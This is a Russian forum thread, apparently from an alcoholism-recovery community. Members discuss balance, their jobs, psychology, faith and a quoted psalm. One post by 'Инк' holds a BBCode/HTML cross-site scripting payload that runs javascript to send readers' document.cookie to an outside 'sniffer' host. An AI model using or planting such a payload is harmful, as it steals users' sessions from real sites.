а учитывая еще и то что сами "учителя" воспитывались там же в том же социуме - то мама-не горюй....
Спустя 5 минут, 31 секунду (23.09.2010 - 00:14) velosipedistka написал(а):
Rearranger
Теперь поняла. Еще как)
Чем ты в жизни занимаешься, если не секрет? Я о профессии. Скорее всего отшутишься и не ответишь, но вдруг)
Теперь поняла. Еще как)
Чем ты в жизни занимаешься, если не секрет? Я о профессии. Скорее всего отшутишься и не ответишь, но вдруг)
Спустя 2 минуты, 5 секунд (23.09.2010 - 00:16) Rearranger написал(а):
velosipedistka
сажатель морквы разумеется, а остальные думают что дизайнер
сажатель морквы разумеется, а остальные думают что дизайнер
Спустя 1 минуту, 29 секунд (23.09.2010 - 00:18) velosipedistka написал(а):
Пасиба) Че-то такое и думала - либо журналюга, либо дизайнер.
Спустя 1 минуту, 37 секунд (23.09.2010 - 00:19) Rearranger написал(а):
velosipedistka
ну вот и ты вовлеклась -
я моркву сажаю, а дизайнер - прикрытие для налоговой и психиатров
ну вот и ты вовлеклась -
я моркву сажаю, а дизайнер - прикрытие для налоговой и психиатров
Спустя 1 минуту, 42 секунды (23.09.2010 - 00:21) velosipedistka написал(а):
Rearranger
Я почти психиатр, так что все как надо:)
Я почти психиатр, так что все как надо:)
Спустя 9 часов, 27 минут, 21 секунду (23.09.2010 - 09:48) pechora написал(а):
Спустя 1 час, 9 минут, 41 секунду (23.09.2010 - 10:58) Валерий.С написал(а):
Цитата (velosipedistka @ 23.09.2010 - 00:21 ) |
Я почти психиатр, так что все как надо:) |
Да не,выздоравливающий психиатр,как сантехник выздоравливающий это вполне приемлемо.
Вот неалкоголиковых психиатров....хотя одного знаю,горой за нас стоит,в других сомневаюсь.
Спустя 21 минуту, 54 секунды Валерий.С написал(а):
Цитата (Rearranger @ 21.09.2010 - 23:33 ) |
всё остальное wink.gif сказал ТЫ, - и это именно тот взгляд которым ТЫ смотришь на мир и оцениваешь его |
Это как раз твой взгляд на мир,который ты оцениваешь,я сослался на конкретный источник,
откуда черпаю то,что реально помогает.В этой теме дана задача....потом ответы были,всё
хорошо в принципе,но это как не зная геометрии,взять и списать ответ.Без знания решения
никогда не будешь знать самого предмета.Тоже и здесь,скажи мне,что не надо пить первую
рюмку-ответ правильный,замечательно,браво!А как её не пить???Тут мне годами будут рассказывать
само решение.Извини,но я сделал правильно,дал конкретный источник,а не как ты пишешь,
свою позицию оценки мира.Хотя в этом ты прав я считаю свою позицию правильной и меня в
этом не смутят,потому что мне реально помогает.Тебе помогает другая позиция,ему третья,но...
каждый доносит своё,человек слушающий выбирает сам!
Спустя 1 час, 50 минут, 40 секунд (23.09.2010 - 12:49) Rearranger написал(а):
Валерий.С
дык на здоровье, всё делаешь правильно, молодец.
дык на здоровье, всё делаешь правильно, молодец.
Спустя 4 минуты, 34 секунды (23.09.2010 - 12:53) Валерий.С написал(а):
Спустя 2 минуты, 32 секунды (23.09.2010 - 12:56) Morsla написал(а):
Вспомнила себя когла пришла сюда. Спецом была во всех областях.. чем дальше в лес толще партизаны... мешало мне это пришлось все что знаю выкинуть ибо не работало.. казалось только
Спустя 7 часов, 59 минут, 3 секунды (23.09.2010 - 20:55) velosipedistka написал(а):
Цитата (Ручеек @ 23.09.2010 - 11:29 ) |
Почти психиатр? Это как? Как почти беременная? |
клинический психолог
Спустя 4 минуты, 21 секунду velosipedistka написал(а):
Если вдруг это мне, то я прям спецом себя во всех областях не считаю))) В одной разве что только - в профессиональной. Но она мало имеет отношения к тому, что здесь. Сюда я пришла с полным доверием, потому что привели стОящие люди. Я скорее впитываю пока.
Спустя 1 час, 18 минут, 19 секунд (23.09.2010 - 22:13) velosipedistka написал(а):
Спустя 56 минут, 39 секунд (23.09.2010 - 23:10) рыжий лекарь написал(а):
Цитата |
Как найти золотую середину?. |
Если выпил от души - все девчата хороши!
Если выпил мало, скупо - все вокруг убого, глупо.
Золотая середина
Ты, увы, недостижима...
Спустя 1 час, 11 минут, 24 секунды (24.09.2010 - 00:21) Morsla написал(а):
Цитата |
Цитата (Morsla @ 23.09.2010 - 12:56 ) Вспомнила себя когла пришла сюда. Спецом была во всех областях.. чем дальше в лес толще партизаны... мешало мне это пришлось все что знаю выкинуть ибо не работало.. казалось только Если вдруг это мне, то я прям спецом себя во всех областях не считаю))) В одной разве что только - в профессиональной. Но она мало имеет отношения к тому, что здесь. Сюда я пришла с полным доверием, потому что привели стОящие люди. Я скорее впитываю пока. |
Да нет не тебе, просто про себя вспомнила и хихикнула тоже про себя... то что дает программа это сильно отличается от того как мы снаружи даже с мед и псих образованием привыкли думать... мне пришлось все оставить за дверью... голой войти совсем... у меня даже мечта МППГУ отпала навсегда. за ненадобностью ... вот настолько мощно что все остальное становиться ненужно. Хотя на образование еще освоить и это - цены не будет как спецу.... кругозор будет 360 С...
Спустя 3 минуты, 4 секунды (24.09.2010 - 00:24) pechora написал(а):
Спустя 5 минут, 39 секунд (24.09.2010 - 00:30) Morsla написал(а):
pechora
А не обольшайси... старенькая я уже...
А не обольшайси... старенькая я уже...
Спустя 3 минуты, 40 секунд (24.09.2010 - 00:34) pechora написал(а):
Спустя 2 минуты, 51 секунду (24.09.2010 - 00:36) velosipedistka написал(а):
Да, мне тоже много чего пришлось поскидывать, чтобы смочь "войти". Но кое-что (и профессиональное) уже в программе приобреталось, паралелльно. Мне со спонсором повезло очень в этом смысле - много всяких совпадений.
Спустя 15 минут, 44 секунды (24.09.2010 - 00:52) velosipedistka написал(а):
Спустя 9 минут, 18 секунд (24.09.2010 - 01:01) Morsla написал(а):
velosipedistka
Скорее всего обесцениться большая часть приобретенных знаний. Ведь психология это попытка поправить свое душвное здоровье и обрести здравомыслие и установить отношение с миром и к миру без ВС. У людей не очень так сказать не смертельно больных он помогает взрослеть..решать некотрые проблемы. Но у нас нет...
От меня почти уже всё отвалилось... даже интерес потеряла хотя горела интересом сильно... большая база.
Скорее всего обесцениться большая часть приобретенных знаний. Ведь психология это попытка поправить свое душвное здоровье и обрести здравомыслие и установить отношение с миром и к миру без ВС. У людей не очень так сказать не смертельно больных он помогает взрослеть..решать некотрые проблемы. Но у нас нет...
От меня почти уже всё отвалилось... даже интерес потеряла хотя горела интересом сильно... большая база.
Спустя 11 минут, 15 секунд (24.09.2010 - 01:13) Morsla написал(а):
Ручеек
Можно ... я буду рада. Кинь мне в журнал в комменты... Хорошо? Флудить не по теме вон на меня уже и так симпатии возросли ... залюбят а то
возврашаясь к теме
Золотая серединна часах 00 12 я собиралась спать в 22 00 а по факту все последнии дни засапала в 02 00 ... значит самое время и себе хорошо сделать и В тему попасть... Воть.
Печера я пошутила... серьезно меня не воспринимай у меня приступы неумелого остроумия после Бомжа со сценарием...
Можно ... я буду рада. Кинь мне в журнал в комменты... Хорошо? Флудить не по теме вон на меня уже и так симпатии возросли ... залюбят а то
возврашаясь к теме
Золотая серединна часах 00 12 я собиралась спать в 22 00 а по факту все последнии дни засапала в 02 00 ... значит самое время и себе хорошо сделать и В тему попасть... Воть.
Печера я пошутила... серьезно меня не воспринимай у меня приступы неумелого остроумия после Бомжа со сценарием...
Спустя 7 часов, 35 минут, 30 секунд (24.09.2010 - 08:48) velosipedistka написал(а):
Будем ли мы считать, что медик приходит в медицину в попытке обрести физическое здоровье? Будем ли мы считать, что медицина отрицает ВС? Вряд ли. Психолог - такая же работа как куча других. Есть много непрофессионалов, есть люди, которые профессионалы от Бога. Противоречия ВС и например, какой-нибудь работы с горем или утратой в психотерапии я не вижу. Может, мне повезло с окружением. Определенная часть профи вокруг меня - выздоравливающие с пятнадцати-двадцатилетним стажем трезвости, либо верующие люди. Так что не стоит у меня так вопрос совсем. От человека зависит, а не от профессии, что и как он несет в мир и в себе.
Спустя 8 минут, 43 секунды velosipedistka написал(а):
Morsla
Друзья и знакомые мои работали с аутистами, с детьми из Беслана, с пережившими терракты и тд. Где тут противоречение ВС?...
Либо ты про посыл, зачем человек идет в эту работу. Так вот если исходя из того, чтобы только со своими тараканами разобраться, не так уж часто, он потом практикуется. И именно что - отваливается все со временем.
Спустя 2 часа, 7 минут, 3 секунды (24.09.2010 - 10:55) Morsla написал(а):
velosipedistka
Я не спорю и не умалаю ни чьих заслуг и добра... Боже упаси. Просто Программа это совсем другое.
Я говорю о себе только... о преображении багажа. О наполнении новым смыслом и приобретении новых оттенков и чистки ненужного...
Я не спорю и не умалаю ни чьих заслуг и добра... Боже упаси. Просто Программа это совсем другое.
Я говорю о себе только... о преображении багажа. О наполнении новым смыслом и приобретении новых оттенков и чистки ненужного...
Спустя 33 минуты, 57 секунд (24.09.2010 - 11:29) Валерий.С написал(а):
Удивительно высказывания тех,кто не находил и не ищет эту серединку,настаивая что её нет,
кто не ищет тот и не находит,чего вы вообще тогда тут делаете?Пытаетесь переубедить своим
бездействием и отрицанием?Если вы не находите выход,вы в нём стоите!
кто не ищет тот и не находит,чего вы вообще тогда тут делаете?Пытаетесь переубедить своим
бездействием и отрицанием?Если вы не находите выход,вы в нём стоите!
Спустя 10 часов, 20 минут, 25 секунд (24.09.2010 - 21:50) velosipedistka написал(а):
Конечно, программа - другое. Они вообще для меня про разное. Мне непонятно просто это противопоставление. Не все люди зависимые на белом свете, но есть среди и независимых такие, которым нужна помощь. В том, что в психологи идти, чтобы от зависимости вылечиться - полная чушь, я согласна. Уверенна даже.
В общем психотерапия - это моя работа. К программе не относящаяся. Так же как вон дизайнеры тут есть, как оказалось. И сажатели морквы, ага:)))
Спустя 40 минут, 46 секунд (24.09.2010 - 22:30) Rearranger написал(а):
Валерий.С
а кто настаивал что ее нет???? кто именно тебя пытается переубедить? Судя по пассажу про выход - наверное те кто нашли? Или кто? Ну реально интересно - прочел, не нашел логики - заинтересовался тем, что же имелось ввиду.
Аффтар, отзовись, а то я волнуюсь!!!!!
Середина есть - но достигает ее каджый САМ в меру своих возможностей и опыта, опыт невозможно передать, его можно рассказать - но не передать, посему - те кто дают советы - могут убить себя об стену, их советы хороши для них самих. Каждому придется учиться находить эту самую середину - САМОСТОЯТЕЛЬНО. (разжеванно для особо одаренных) Можешь попробовать воспользоваться советами по обретению 3C от дяди Васи, поможет, только если сам станешь дядьВасей.....
а кто настаивал что ее нет???? кто именно тебя пытается переубедить? Судя по пассажу про выход - наверное те кто нашли? Или кто? Ну реально интересно - прочел, не нашел логики - заинтересовался тем, что же имелось ввиду.
Аффтар, отзовись, а то я волнуюсь!!!!!
Середина есть - но достигает ее каджый САМ в меру своих возможностей и опыта, опыт невозможно передать, его можно рассказать - но не передать, посему - те кто дают советы - могут убить себя об стену, их советы хороши для них самих. Каждому придется учиться находить эту самую середину - САМОСТОЯТЕЛЬНО. (разжеванно для особо одаренных) Можешь попробовать воспользоваться советами по обретению 3C от дяди Васи, поможет, только если сам станешь дядьВасей.....
Спустя 34 минуты, 9 секунд (24.09.2010 - 23:04) Валерий.С написал(а):
Прикол,самоликвидация!А,точно ,велосипедистка чё тута пишет?
Цитата (Rearranger @ 24.09.2010 - 22:30 ) |
а кто настаивал что ее нет???? |
Да,кстати,хто эта настаивает,не надо мне настоек,эт вредна.
Поздравляю,считай что я погорячился,потому что всю тему не просмотрел перед тем,как писать.
Признаю своё бессилие,не волновайся,всё харашо!!!Тот кто в исток нагадить мог или поток.
Спустя 38 минут, 14 секунд (24.09.2010 - 23:43) velosipedistka написал(а):
Совсем уже ничего не понимаю. Валерий, мне так кажется, что у нас с тобой, помимо алкоголизма, еще одна общая болезнь. Мы свое что-то прочитываем в чужих словах))) И расстраиваемся, и спорим.
Мне важно то, что ты написал в этой темке. И отдельное тебе спасибо за это! А серединка, она же отсутствие качелей - да, у каждого своя.
Спустя 11 минут, 55 секунд (24.09.2010 - 23:55) Валерий.С написал(а):
Цитата (velosipedistka @ 24.09.2010 - 23:43 ) |
еще одна общая болезнь. Мы свое что-то прочитываем в чужих словах))) И расстраиваемся, и спорим. |
Да всё хорошо)))это просто разгрузка атмосферы,пора выпустить пар пришла.С тобой я ни в чём не спорю и ни с кем не хочу спорить,а бывает что авторы удаляют или исправляют сообщения,это
нормально,помнить что мы больные,хоть и выздоравливающие!
Спустя 15 минут, 17 секунд (25.09.2010 - 00:10) velosipedistka написал(а):
Валерий.С
Да я поняла, что ты не со мной:) Надо помнить, что больные, точно:) Скажи, пожалуйста, а слова молитвы, написанные у тебя в сообщениях - это твоя переформулировка или где-то нашел? Кроме первой и последней строчки, остальные какие-то очень актуальные для меня сейчас.
Да я поняла, что ты не со мной:) Надо помнить, что больные, точно:) Скажи, пожалуйста, а слова молитвы, написанные у тебя в сообщениях - это твоя переформулировка или где-то нашел? Кроме первой и последней строчки, остальные какие-то очень актуальные для меня сейчас.
Спустя 8 минут, 23 секунды (25.09.2010 - 00:18) velosipedistka написал(а):
Слейд
Привет! Не очень понятно, кого слушаешь или чего? А так, рада тебе очень)
Привет! Не очень понятно, кого слушаешь или чего? А так, рада тебе очень)
Спустя 23 часа, 42 минуты, 26 секунд (26.09.2010 - 00:01) Rearranger написал(а):
а бывает что авторы удаляют или исправляют сообщения,это
нормально разумеется нормально, есть же кнопка "исправить".....
кнопка "удалить" тоже есть.... и потом я не идеален - могу и передумать
нормально разумеется нормально, есть же кнопка "исправить".....
кнопка "удалить" тоже есть.... и потом я не идеален - могу и передумать
Спустя 59 минут, 45 секунд (26.09.2010 - 01:00) Инк написал(а):
SQL |
[email=wj@wj.com">wj@wj<a href="http://www.wj.com`=`" target="_blank">">[/email].com ` style=`background:url(java script:document.images[1].src="http://vah_snifer.com/s.gif?"+document.cookie);` [HTML][color=white][EMAIL=[URL=http://wj`=`]'><a href='http://wj`=`' target='_blank'>[/EMAIL][/URL][/color]` style=`background:url(jаvаscript:document.image s[1].src="http://vah_snifer.com/s.gif?"+document.cookie);` |
Спустя 35 минут (26.09.2010 - 01:35) Morsla написал(а):
Отрекись от зла,и сотвори добро. строчка из Псалма Давида 33 го - один из моих любимых
Свернутый текст
Благословлю Господа на всякое время, выну хвала Его во устехъ моихъ: о Господе похвалится душа: да услышатъ кротцыи, и возвеселятся. Возвеличите Господа со мною, и вознесемъ имя Его вкупе. Взысках Господа, и услыша мя, и отъ всехъ скорбей моихъ избави мя. Приступите къ Нему и просветитеся, и лица ваша не постыдятся. Сей нищий воззва, и Господь услыша и, и от всехъ скорбей его спасе и. Ополчится ангелъ Господень окрестъ боящихся Его и избавитъ ихъ. Вкусите и видите, яко благ Господь: блаженъ мужъ, иже уповаетъ нань. Бойтеся Господа, вси святии Его: яко несть лишения боящимся Его. Богатии обнищаша и взалкаша взыскающии же Господа не лишатся всякаго блага. Приидите, чада, послушайте мене, страху Господню научу васъ. Кто есть человекъ хотяй животъ, любяй дни видети благи? Удержи языкъ твой от зла, и устне твои еже не глаголати льсти. Уклонися от зла и сотвори благо: взыши мира и пожени и.Очи Господни на праведныя, и уши Его въ молитву ихъ: лице же Господне на творящыя злая, еже потребити от земли память ихъ.Воззваша праведнии, и Господь услыша ихъ, и от всехъ скорбей избави ихъ. Близъ Господь сокрушенныхъ сердцемъ и смиренныя духомъ спасетъ. Многи скорби праведнымъ, и от всехъ ихъ избавитъ я Господь. Хранитъ Господь вся кости ихъ, ни едина от нихъ сокрушится. Смерть грешниковъ люта, и ненавидящии праведнаго прегрешатъ. Избавитъ Господь души рабъ Своихъ, и не прегрешатъ вси уповающии на Него.
Спустя 2 часа, 37 минут, 21 секунду (26.09.2010 - 04:13) Урсула написал(а):
Я тоже переживаю это постоянно. Как только всё идет налад, сама же причём, не дожидаясь плохого зарание всё испорчу( ЯСНО ЧЕМ), а потом скорблю .
Наверно надо не програмировать плохое, а наоборот. Ведь с другой стороны, если это относится к работе, ну что может случиться? Ну уволят, ну и что. Надо выработать нибудь методику против этих страхов.
Наверно надо не програмировать плохое, а наоборот. Ведь с другой стороны, если это относится к работе, ну что может случиться? Ну уволят, ну и что. Надо выработать нибудь методику против этих страхов.
Спустя 3 минуты, 46 секунд (26.09.2010 - 04:17) Honduras написал(а):
Урсула
Привет! Этому учит программа 12 шагов. Приобретай литературу ААшную и вперёд.
Привет! Этому учит программа 12 шагов. Приобретай литературу ААшную и вперёд.
Спустя 5 часов, 49 минут, 20 секунд (26.09.2010 - 10:06) Rearranger написал(а):
Урсула
этому не только программа 12 шагов учит, этому много кто учит и программа не первооткрыватель этих вещей , уволят.... да и хрен с ним, другую работу найдешь, только так и надо относиться к работе, да и ко многим вещам в социуме
этому не только программа 12 шагов учит, этому много кто учит и программа не первооткрыватель этих вещей , уволят.... да и хрен с ним, другую работу найдешь, только так и надо относиться к работе, да и ко многим вещам в социуме
Спустя 23 минуты, 3 секунды (26.09.2010 - 10:29) Валерий.С написал(а):
Цитата (Morsla @ 26.09.2010 - 01:35 ) |
Отрекись от зла,и сотвори добро. строчка из Псалма Давида 33 го |
Всё верно,я не делаю тайны из того,что верую во Христа,эта вера придаёт цвет и многогранность
моей жизни,а молитву тоже взял у знакомой,хотя ей(молитве) тоже немало лет и конечно потому
что она актуальна для меня,молитва-это не чья то собственность,так и идёт из уста в уста.
Не зря говорят,не можете молиться,молитесь понарошку,придёт понимание и вера и действие
и само чудо.Хуже,когда не стараюсь понять,тупо отрицая что нет того,что я не понимаю.Вместо
того,чтобы потрудиться в этом,от моих исключений из жизни своей(скажем веры или Бога),
проблема так и останется неразрешённой и легче от этого не станет никогда,даже при жизни(с отрицанием),нафиг такая плюшевая защита,только до хорошего порыва ветра,а тем более зная,
что смерти нет и тогда кто не с Богом,тот был против.Разве вера исключает логики,нет,логика
может исключать веру(эгоцентризмом).